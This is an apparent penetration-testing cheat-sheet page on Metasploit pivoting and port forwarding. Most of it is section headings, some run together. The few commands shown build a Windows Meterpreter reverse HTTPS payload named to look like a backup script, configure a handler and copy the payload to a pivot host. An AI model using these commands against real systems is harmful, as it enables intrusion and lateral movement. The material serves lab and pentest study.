๐(MSF) Remote/Reverse Port Forwarding with SSH
Meterpreter Reverse Shell
Creating a Windows Payload with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080Configuring & Starting the multi/handler (msfconsole)
use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_httpsset lhost 0.0.0.0set lport 8000Transferring Payload to Pivot Host
scp backupscript.exe ubuntu@<ipAddressofTarget>:~/Starting Python3 Webserver on Pivot Host
Downloading Payload from Windows Target
Using SSH -R
Meterpreter Tunneling & Port Forwarding
Creating Payload for Ubuntu Pivot Host
Configuring & Starting the multi/handler
SCP FILE TRANSFER (Transferring Payload to Pivot Host)
Executing the Payload on the Pivot Host
Ping Sweep
For Loop on Linux Pivot Hosts
For Loop Using CMD
Using PowerShell
MSF's SOCKS Proxy
Confirming Proxy Server is Running
/etc/proxychains.conf
Creating Routes with AutoRoute
msfconsole
Creating Routes with AutoRoute
Listing Active Routes with AutoRoute
Testing Proxy & Routing Functionality
Port Forwarding
Portfwd Options (Meterpreter)
Connecting to Windows Target through localhost
Meterpreter Reverse Port Forwarding
Last updated